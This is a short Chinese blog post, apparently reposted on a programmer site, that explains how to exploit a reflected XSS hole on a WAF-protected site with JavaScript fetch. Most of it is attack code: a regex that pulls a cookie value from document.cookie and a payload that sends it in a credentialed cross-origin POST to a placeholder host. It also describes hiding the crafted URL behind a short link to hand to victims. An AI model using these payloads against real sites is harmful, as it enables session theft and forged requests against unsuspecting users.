xss利用之fetch

栏目: 编程工具 · 发布时间: 6年前

内容简介:偶然间发现某站有个漏洞因为有WAF不好利用,我之前是不知道能咋利用,然后大佬说能XSS利用,叫我写个fetch利用,

偶然间发现某站有个漏洞

因为有WAF不好利用,我之前是不知道能咋利用,

然后大佬说能XSS利用,叫我写个fetch利用,

我?????

试着去学fetch这个东西了

于是有了此文

正文

首先看看说明文档那个样子 https://segmentfault.com/a/1190000007019545

大致理解了

然后发出一个fetch的post请求

也就是这个样子

fetch("http://192.168.199.141:3000/api/user/",{
  method:'POST',
  headers:{
     'Content-Type': 'application/json'
  },
  body:JSON.stringify({
    name:'john',
    pass:'xioayuan'
  })
})
.then((response)=>response.json())
.then((responseJsonData)=>{
  alert("请求成功");
  console.log(responseJsonData);
})
.catch((error)=>{
  alert(error);
})

如果XSS点能利用,就在这里发送一个fetch请求,来作为利用点

假如利用点要用到cookie里面的某些值,我们可以用js来提取cookie里的特定段值,可以写个正则提取比如

document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1')

这样就能提取到key的值了

上面的body是一个json类型,如果是一般类型的我们可以直接写一个这样的JS

var form = 'xxxxxx'+document.cookie.replace(/(?:(?:^|.*;\s*)key\s*\=\s*([^;]*).*$)|^.*$/, '$1');
fetch('https://api.xxxx.com/add', {
method: "POST",
mode: "cors",
credentials: 'include',
headers: {
"Content-Type": "application/x-www-form-urlencoded"
},
body: form
});

直接在url里面构造就行了,然后把链接去生成一个短链接,就算完成了。

这样一个反射XSS的利用还是蛮有意思的。


以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

网飞传奇

网飞传奇

[美]吉娜·基廷 / 谭永乐 / 中信出版社 / 2014-1-1 / 42

飞的历史充满了传奇色彩,它的崛起伴随着复杂斗争、幸运转折、个人背叛……它自身的历史比它出租的那些电影还要更富有戏剧性。网飞在1997年建立,而建立的原因仅仅是因为创始人伦道夫和哈斯廷斯没有按时归还租借的DVD,还要缴纳因此而产生的滞纳金。 1999年,网飞公司摒弃了百视达的“每片付租”模式,转而采用了一种订阅模式:用户只需要支付固定费用,就能尽情租片观赏,免去了到期还片日、滞纳金、运费和手续......一起来看看 《网飞传奇》 这本书的介绍吧!

CSS 压缩/解压工具
CSS 压缩/解压工具

在线压缩/解压 CSS 代码

在线进制转换器
在线进制转换器

各进制数互转换器

html转js在线工具
html转js在线工具

html转js在线工具